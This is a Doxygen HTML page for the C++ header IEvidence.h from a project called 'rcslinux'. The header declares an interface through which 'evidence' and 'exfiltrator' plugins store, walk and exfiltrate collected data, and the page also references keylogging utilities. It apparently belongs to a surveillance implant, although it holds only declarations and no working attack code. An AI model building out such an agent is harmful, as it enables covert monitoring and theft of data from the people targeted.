<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.18"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>rcslinux: include/IEvidence.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">rcslinux
   </div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.18 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
/* @license-end */</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div id="nav-path" class="navpath">
  <ul>
<li class="navelem"><a class="el" href="dir_d44c64559bbebec7f509842c48db8b23.html">include</a></li>  </ul>
</div>
</div><!-- top -->
<div class="header">
  <div class="headertitle">
<div class="title">IEvidence.h</div>  </div>
</div><!--header-->
<div class="contents">
<a href="IEvidence_8h.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno">    1</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00002"></a><span class="lineno">    2</span>&#160;<span class="comment">// Created by jrf/ht on 17/02/19.</span></div>
<div class="line"><a name="l00003"></a><span class="lineno">    3</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00004"></a><span class="lineno">    4</span>&#160; </div>
<div class="line"><a name="l00005"></a><span class="lineno">    5</span>&#160;<span class="preprocessor">#ifndef RCSLINUX_IEVIDENCE_H</span></div>
<div class="line"><a name="l00006"></a><span class="lineno">    6</span>&#160;<span class="preprocessor">#define RCSLINUX_IEVIDENCE_H</span></div>
<div class="line"><a name="l00007"></a><span class="lineno">    7</span>&#160; </div>
<div class="line"><a name="l00011"></a><span class="lineno">   11</span>&#160;<span class="keyword">namespace </span><a class="code" href="namespaceAgentCore.html">AgentCore</a> {</div>
<div class="line"><a name="l00012"></a><span class="lineno">   12</span>&#160; </div>
<div class="line"><a name="l00023"></a><span class="lineno"><a class="line" href="structAgentCore_1_1__EvidenceStartParams.html">   23</a></span>&#160;    <span class="keyword">typedef</span> <span class="keyword">struct </span><a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">_EvidenceStartParams</a> {</div>
<div class="line"><a name="l00024"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">   24</a></span>&#160;        <span class="keywordtype">int</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a>; </div>
<div class="line"><a name="l00025"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">   25</a></span>&#160;        <span class="keywordtype">void</span>* <a class="code" href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">in</a>; </div>
<div class="line"><a name="l00026"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">   26</a></span>&#160;        <span class="keywordtype">int</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">inSize</a>; </div>
<div class="line"><a name="l00027"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga4d1a4cebd5a893bed7f7d741b71dbc29">   27</a></span>&#160;        <span class="keywordtype">char</span>* <a class="code" href="group__EVIDENCE__INTERNAL.html#ga4d1a4cebd5a893bed7f7d741b71dbc29">storagePath</a>; </div>
<div class="line"><a name="l00028"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga339499d0b71034c8546bb66d25bd066d">   28</a></span>&#160;        uint64_t <a class="code" href="group__EVIDENCE__INTERNAL.html#ga339499d0b71034c8546bb66d25bd066d">storageSize</a>; </div>
<div class="line"><a name="l00029"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">   29</a></span>&#160;        <span class="keywordtype">char</span>* <a class="code" href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">evidencePath</a>; </div>
<div class="line"><a name="l00030"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga4fb8d399ac90102d087ca9412d29501c">   30</a></span>&#160;        uint8_t* <a class="code" href="group__EVIDENCE__INTERNAL.html#ga4fb8d399ac90102d087ca9412d29501c">out</a>; </div>
<div class="line"><a name="l00031"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga711f219c1a17aa2f9e18e994962d473e">   31</a></span>&#160;        <span class="keywordtype">size_t</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#ga711f219c1a17aa2f9e18e994962d473e">outSize</a>; </div>
<div class="line"><a name="l00032"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga173cbb407da6871d1d2587b47fa52e44">   32</a></span>&#160;    } <a class="code" href="group__EVIDENCE__INTERNAL.html#ga173cbb407da6871d1d2587b47fa52e44">EvidenceStartParams</a>;</div>
<div class="line"><a name="l00033"></a><span class="lineno">   33</span>&#160; </div>
<div class="line"><a name="l00037"></a><span class="lineno">   37</span>&#160;<span class="preprocessor">#define EVIDENCE_ADD    1</span></div>
<div class="line"><a name="l00038"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gaaaf16ceaea6174d1762d3639f4fd72d9">   38</a></span>&#160; </div>
<div class="line"><a name="l00041"></a><span class="lineno">   41</span>&#160;<span class="preprocessor">#define EVIDENCE_REMOVE 2</span></div>
<div class="line"><a name="l00042"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gabd852dd6e48372d695a19e827694ae1b">   42</a></span>&#160; </div>
<div class="line"><a name="l00046"></a><span class="lineno">   46</span>&#160;<span class="preprocessor">#define EVIDENCE_STORAGE_SIZE   3</span></div>
<div class="line"><a name="l00047"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga9eb6e189e7295dc2ba2af6bda819f6dc">   47</a></span>&#160; </div>
<div class="line"><a name="l00051"></a><span class="lineno">   51</span>&#160;<span class="preprocessor">#define EVIDENCE_STORAGE_PATH   4</span></div>
<div class="line"><a name="l00052"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga9fd73bd75e66453d42897b6efacbb319">   52</a></span>&#160; </div>
<div class="line"><a name="l00056"></a><span class="lineno">   56</span>&#160;<span class="preprocessor">#define EVIDENCE_WALK  5</span></div>
<div class="line"><a name="l00057"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gabf196e25206d836cd8e6cf3e8664ba94">   57</a></span>&#160; </div>
<div class="line"><a name="l00061"></a><span class="lineno">   61</span>&#160;<span class="preprocessor">#define EVIDENCE_EXFILTRATE    6</span></div>
<div class="line"><a name="l00062"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gabc3d9ed56f1b62fac4fdea93d2dd7646">   62</a></span>&#160; </div>
<div class="line"><a name="l00063"></a><span class="lineno">   63</span>&#160;    <span class="comment">/* @}</span></div>
<div class="line"><a name="l00064"></a><span class="lineno">   64</span>&#160;<span class="comment">     * @}</span></div>
<div class="line"><a name="l00065"></a><span class="lineno">   65</span>&#160;<span class="comment">     * */</span></div>
<div class="line"><a name="l00066"></a><span class="lineno">   66</span>&#160; </div>
<div class="line"><a name="l00071"></a><span class="lineno"><a class="line" href="classAgentCore_1_1IEvidence.html">   71</a></span>&#160;    <span class="keyword">class </span><a class="code" href="classAgentCore_1_1IEvidence.html">IEvidence</a> {</div>
<div class="line"><a name="l00072"></a><span class="lineno">   72</span>&#160;    <span class="keyword">public</span>:</div>
<div class="line"><a name="l00081"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gac63288a39935f68533dcc51e70bfb932">   81</a></span>&#160;        <span class="keyword">virtual</span> <span class="keywordtype">int</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gac63288a39935f68533dcc51e70bfb932">addEvidence</a>(<span class="keyword">const</span> <span class="keywordtype">char</span>* json) = 0;</div>
<div class="line"><a name="l00082"></a><span class="lineno">   82</span>&#160; </div>
<div class="line"><a name="l00092"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga7405e86c5f5662494ed6f44abfd8e192">   92</a></span>&#160;        <span class="keyword">virtual</span> <span class="keywordtype">int</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#ga7405e86c5f5662494ed6f44abfd8e192">addCommandResultEvidence</a>(<span class="keywordtype">int</span> res, <span class="keyword">const</span> <span class="keywordtype">char</span>* resStr=<span class="keyword">nullptr</span>, uint32_t cmdId=0, uint32_t batchId=0) = 0;</div>
<div class="line"><a name="l00093"></a><span class="lineno">   93</span>&#160; </div>
<div class="line"><a name="l00101"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gab57569269b0980ec0b7b248e69d81428">  101</a></span>&#160;        <span class="keyword">virtual</span> <a class="code" href="classBdUtils_1_1CJson.html">BdUtils::CJson</a>* <a class="code" href="group__EVIDENCE__INTERNAL.html#gab57569269b0980ec0b7b248e69d81428">initializeEvidenceJson</a>(<span class="keyword">const</span> <span class="keywordtype">char</span>* type, uint32_t cmdId = 0, uint32_t batchId = 0) = 0;</div>
<div class="line"><a name="l00102"></a><span class="lineno">  102</span>&#160; </div>
<div class="line"><a name="l00109"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gac672867ff0098a129998bae634b99c98">  109</a></span>&#160;        <span class="keyword">virtual</span> <span class="keywordtype">int</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gac672867ff0098a129998bae634b99c98">removeEvidence</a>(<span class="keyword">const</span> <span class="keywordtype">char</span>* path) = 0;</div>
<div class="line"><a name="l00110"></a><span class="lineno">  110</span>&#160; </div>
<div class="line"><a name="l00117"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gaa3769e6b8d4c91866d6a807879dfe39f">  117</a></span>&#160;        <span class="keyword">virtual</span> <span class="keywordtype">int</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gaa3769e6b8d4c91866d6a807879dfe39f">currentStorageSize</a>(uint64_t* size) = 0;</div>
<div class="line"><a name="l00118"></a><span class="lineno">  118</span>&#160; </div>
<div class="line"><a name="l00125"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga474be1e3f303676c1bff1d805922123f">  125</a></span>&#160;        <span class="keyword">virtual</span> <span class="keyword">const</span> <span class="keywordtype">char</span>* <a class="code" href="group__EVIDENCE__INTERNAL.html#ga474be1e3f303676c1bff1d805922123f">storagePath</a>() = 0;</div>
<div class="line"><a name="l00126"></a><span class="lineno">  126</span>&#160; </div>
<div class="line"><a name="l00131"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gadc7d20367043ee8ca8ec9f652b616aa3">  131</a></span>&#160;        <span class="keyword">virtual</span> <span class="keywordtype">void</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gadc7d20367043ee8ca8ec9f652b616aa3">enable</a>(<span class="keywordtype">bool</span> enabled) = 0;</div>
<div class="line"><a name="l00132"></a><span class="lineno">  132</span>&#160; </div>
<div class="line"><a name="l00137"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#gab005c7617d3049213c430c23ee158d6c">  137</a></span>&#160;        <span class="keyword">virtual</span> <span class="keywordtype">bool</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#gab005c7617d3049213c430c23ee158d6c">isEnabled</a>() =0;</div>
<div class="line"><a name="l00138"></a><span class="lineno">  138</span>&#160; </div>
<div class="line"><a name="l00147"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga0faa5d9bcdc6de5d7bdbc1ada68b8a47">  147</a></span>&#160;        <span class="keyword">virtual</span> <span class="keywordtype">int</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#ga0faa5d9bcdc6de5d7bdbc1ada68b8a47">walkEvidences</a>() = 0;</div>
<div class="line"><a name="l00148"></a><span class="lineno">  148</span>&#160; </div>
<div class="line"><a name="l00158"></a><span class="lineno"><a class="line" href="group__EVIDENCE__INTERNAL.html#ga3c492d604cde635c9079a36db4045da3">  158</a></span>&#160;        <span class="keyword">virtual</span> <span class="keywordtype">void</span> <a class="code" href="group__EVIDENCE__INTERNAL.html#ga3c492d604cde635c9079a36db4045da3">exfiltrateEvidence</a>(<span class="keywordtype">char</span>* path, uint8_t* data, <span class="keywordtype">int</span> size, <span class="keywordtype">bool</span> spawn=<span class="keyword">false</span>) = 0;</div>
<div class="line"><a name="l00159"></a><span class="lineno">  159</span>&#160; </div>
<div class="line"><a name="l00160"></a><span class="lineno">  160</span>&#160;    };</div>
<div class="line"><a name="l00161"></a><span class="lineno">  161</span>&#160;}</div>
<div class="line"><a name="l00162"></a><span class="lineno">  162</span>&#160;<span class="preprocessor">#endif //RCSLINUX_IEVIDENCE_H</span></div>
</div><!-- fragment --></div><!-- contents -->
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga173cbb407da6871d1d2587b47fa52e44"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga173cbb407da6871d1d2587b47fa52e44">AgentCore::EvidenceStartParams</a></div><div class="ttdeci">struct AgentCore::_EvidenceStartParams EvidenceStartParams</div><div class="ttdoc">evidence and exfiltrator plugins AgentPlugin::IPlugin::start() will be called with a pointer to this ...</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gac672867ff0098a129998bae634b99c98"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gac672867ff0098a129998bae634b99c98">AgentCore::IEvidence::removeEvidence</a></div><div class="ttdeci">virtual int removeEvidence(const char *path)=0</div></div>
<div class="ttc" id="aclassAgentCore_1_1IEvidence_html"><div class="ttname"><a href="classAgentCore_1_1IEvidence.html">AgentCore::IEvidence</a></div><div class="ttdoc">exposes the evidence manager AgentCorePrivate::CEvidenceManager to the plugins</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00071">IEvidence.h:71</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga4fb8d399ac90102d087ca9412d29501c"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga4fb8d399ac90102d087ca9412d29501c">AgentCore::_EvidenceStartParams::out</a></div><div class="ttdeci">uint8_t * out</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00030">IEvidence.h:30</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gab57569269b0980ec0b7b248e69d81428"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gab57569269b0980ec0b7b248e69d81428">AgentCore::IEvidence::initializeEvidenceJson</a></div><div class="ttdeci">virtual BdUtils::CJson * initializeEvidenceJson(const char *type, uint32_t cmdId=0, uint32_t batchId=0)=0</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga339499d0b71034c8546bb66d25bd066d"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga339499d0b71034c8546bb66d25bd066d">AgentCore::_EvidenceStartParams::storageSize</a></div><div class="ttdeci">uint64_t storageSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00028">IEvidence.h:28</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gac63288a39935f68533dcc51e70bfb932"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gac63288a39935f68533dcc51e70bfb932">AgentCore::IEvidence::addEvidence</a></div><div class="ttdeci">virtual int addEvidence(const char *json)=0</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga48e7b89694845643759212d026351465"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">AgentCore::_EvidenceStartParams::inSize</a></div><div class="ttdeci">int inSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00026">IEvidence.h:26</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gaa3769e6b8d4c91866d6a807879dfe39f"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gaa3769e6b8d4c91866d6a807879dfe39f">AgentCore::IEvidence::currentStorageSize</a></div><div class="ttdeci">virtual int currentStorageSize(uint64_t *size)=0</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga4d1a4cebd5a893bed7f7d741b71dbc29"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga4d1a4cebd5a893bed7f7d741b71dbc29">AgentCore::_EvidenceStartParams::storagePath</a></div><div class="ttdeci">char * storagePath</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00027">IEvidence.h:27</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga474be1e3f303676c1bff1d805922123f"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga474be1e3f303676c1bff1d805922123f">AgentCore::IEvidence::storagePath</a></div><div class="ttdeci">virtual const char * storagePath()=0</div></div>
<div class="ttc" id="aclassBdUtils_1_1CJson_html"><div class="ttname"><a href="classBdUtils_1_1CJson.html">BdUtils::CJson</a></div><div class="ttdoc">json encoding/decoding utilities, based on ArduinoJson</div><div class="ttdef"><b>Definition:</b> <a href="CJson_8h_source.html#l00017">CJson.h:17</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gab005c7617d3049213c430c23ee158d6c"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gab005c7617d3049213c430c23ee158d6c">AgentCore::IEvidence::isEnabled</a></div><div class="ttdeci">virtual bool isEnabled()=0</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gaf7722a418bb9513d53b5f63a1f45b660"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">AgentCore::_EvidenceStartParams::evidencePath</a></div><div class="ttdeci">char * evidencePath</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00029">IEvidence.h:29</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gab3661827a38a2a99bb944c5a873f98b4"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">AgentCore::_EvidenceStartParams::mode</a></div><div class="ttdeci">int mode</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00024">IEvidence.h:24</a></div></div>
<div class="ttc" id="anamespaceAgentCore_html"><div class="ttname"><a href="namespaceAgentCore.html">AgentCore</a></div><div class="ttdef"><b>Definition:</b> <a href="CKeylogUtils_8h_source.html#l00012">CKeylogUtils.h:12</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga3c492d604cde635c9079a36db4045da3"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga3c492d604cde635c9079a36db4045da3">AgentCore::IEvidence::exfiltrateEvidence</a></div><div class="ttdeci">virtual void exfiltrateEvidence(char *path, uint8_t *data, int size, bool spawn=false)=0</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga7405e86c5f5662494ed6f44abfd8e192"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga7405e86c5f5662494ed6f44abfd8e192">AgentCore::IEvidence::addCommandResultEvidence</a></div><div class="ttdeci">virtual int addCommandResultEvidence(int res, const char *resStr=nullptr, uint32_t cmdId=0, uint32_t batchId=0)=0</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga0faa5d9bcdc6de5d7bdbc1ada68b8a47"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga0faa5d9bcdc6de5d7bdbc1ada68b8a47">AgentCore::IEvidence::walkEvidences</a></div><div class="ttdeci">virtual int walkEvidences()=0</div></div>
<div class="ttc" id="astructAgentCore_1_1__EvidenceStartParams_html"><div class="ttname"><a href="structAgentCore_1_1__EvidenceStartParams.html">AgentCore::_EvidenceStartParams</a></div><div class="ttdoc">evidence and exfiltrator plugins AgentPlugin::IPlugin::start() will be called with a pointer to this ...</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00023">IEvidence.h:23</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga20360a0574745e71136d9fef2da48f93"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">AgentCore::_EvidenceStartParams::in</a></div><div class="ttdeci">void * in</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00025">IEvidence.h:25</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gadc7d20367043ee8ca8ec9f652b616aa3"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gadc7d20367043ee8ca8ec9f652b616aa3">AgentCore::IEvidence::enable</a></div><div class="ttdeci">virtual void enable(bool enabled)=0</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga711f219c1a17aa2f9e18e994962d473e"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga711f219c1a17aa2f9e18e994962d473e">AgentCore::_EvidenceStartParams::outSize</a></div><div class="ttdeci">size_t outSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00031">IEvidence.h:31</a></div></div>
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by &#160;<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.18
</small></address>
</body>
</html>
